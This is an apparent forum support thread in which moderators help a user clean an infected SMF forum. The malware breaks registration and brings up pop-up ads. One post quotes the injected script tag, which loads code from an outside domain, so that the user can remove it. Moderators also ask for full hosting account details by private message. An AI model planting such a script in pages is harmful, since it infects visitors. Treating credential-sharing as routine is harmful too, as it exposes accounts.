I think you are one of the many people that i helped after the server crash, i'm not too sure. If i was then I missed a file, sorry. You should open up the file that deals with new registrations, probably named smf_registed which maybe in the smf/includes directory and remove the following bit of code from the file:
| Code: |
| <script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=bb297'></script> |
I tried looking for that code in a file, but i couldn't find the right one, ill have another look
Edit: Nope can't find it.

Ok, can you send me all of your hosting account details again and I will find it, this is jsus one reason why its called "malicious" code, the buggers like to hide
There are many files you have to look through. I will be on tomorrow maybe sooner then wumings so if he isn't on just let me know DA i could fix it.

Note that there is not one file, but tens and maybe even a hundred. I am however trying to make time to fix the files.
Does SMF require CHMOD's to be 666 ? Because this CHMOD is not secure enough which is why the malicious code got into 666 chmod files. php files should be 644 which is why i'm a little confused
Thanks for all your help (MODERATORS RULE!!!)
Im not sure about the permissions, the installer should of automatially CHMODded them, so im no help there!

Which theme are you using ? If your not using the theme named "default" then could you please change ? This is because I have fixed all files (sure over 100; as you can imagine its taken quite some time). The only problem is though is that I'm really, really busy so I only fixed the default theme. When I have enough time I will also fix the "classical" and "babylon" themes but this still maybe for some time, up to one month.
*note that the theme "default" should be chosen as the default theme otherwise guests won't be able to register.
When you have changed te default theme could you see whether the problem is still there (i.e - is it possible to register).
Do you wish for me to delete your account info from my PM saveBox ? I usually do this straight away but I will need to do more work on your account in future so do you think that it is wise ?
Could you also see whether the ad is still there on the "main page". I don't know what you mean by this due to the fact there is no problems with the www.peter*****.co.uk/index.html page so I have no idea as to where to look

I rule
YOU'RE THE BEST!!!
I would never of been able to even look at 100s of files.
I always use the default theme, only one other theme is installed and not all the buttons show up on it.
The register button still doesn't work unfortunately, and I meant the ad was on the index.php page of my forum, but I had another look and it's on lots of pages of my forum, it's from www3.coolrip.com or something, and it only seems to popup if I click somewhere on the page.
If you're going to try again, then I think you should keep my details, YOU'RE THE BEST MODERATOR EVER!!!

Congrats Wumings, if there was a poll for best moderator, you have quite a chance(more than no0bie definitely)

After reading the following...

I decided to look again through the files. Amazingly, I missed about 50 files so they have no been fixed. Please see whether the problem has now been fixed.

The malicious code in the files is from domainstat.net, could you please explain where the ads are ? I see two sets of Google Ads but that is all. I have also tried click "somewhere on the page" but no pop-up appears.

I see no malicious code in this file

I think its surely about 200 now, what with the extra files that I've just fount. If i wasn't a member of staff then you'd owe me big time

Unfortunately some think that a poll to see who's best Moderator, (or Moderator of the Week/Month) isn't a good idea as some see it then members will be biased.

in your own opinion. I deal with more support issues, like this current thread, instead of thinking of new ideas and striking up conversation - I'm still stuck in the Dark Ages
Nope, register button still isn't working, and the popup IS from www3.coolrip.com, it pops up occasionally, not on any paticular page.
P.S: I'm now changing my sig to "wumingsden RULES!!!"

I've FIXED IT!!!!!
I loaded a backup register.php file instead of the one there.
I still don't know about the popup though...

well that was the first ever file i checked
If you had a full backup then just re-upload everything
I would have said this in my very first post but i noticed that you have added MOD's to your SMF and i didn't think that you'd have a full backed-up set of files
Could you explain more about the pop-up ? i have search the index.php page and fount nothing
it just pops up randomly on no paticular pages, it happens sometimes when you try posting
I've been having a look a round for the popup for a while, it seems to popup when you try to post something and click in the texteditor.
Maybe, (just maybe), it only pops up if you're a registered member, but I don't know.
Does anyone else have problems with popups from www.coolrip.com?

i'll try and look at it tomorrow for you if i have time, unfortunately i have none of that today. I don't know whether i have your details so could you please re-send them again. i really do need to clear out my PM inbox
